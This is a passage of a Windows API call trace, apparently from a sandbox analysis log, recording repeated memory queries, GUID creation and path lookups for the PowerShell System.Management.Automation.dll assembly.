	[0284.742] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12b7a0, lpBuffer=0x12c660, dwLength=0x30 | out: lpBuffer=0x12c660*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.743] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.743] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.743] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.743] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.743] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xc3d1fcfa, Data2=0x9390, Data3=0x47ea, Data4=([0]=0xa9, [1]=0x7c, [2]=0xf4, [3]=0x50, [4]=0x76, [5]=0xc7, [6]=0x3d, [7]=0x70))) returned 0x0
	[0284.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.744] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x9d681090, Data2=0xac1f, Data3=0x48ee, Data4=([0]=0x90, [1]=0x99, [2]=0x72, [3]=0x51, [4]=0x83, [5]=0x68, [6]=0x3a, [7]=0x31))) returned 0x0
	[0284.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.747] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.748] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.748] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.749] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.749] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.766] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.766] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.767] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.767] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.768] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.768] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
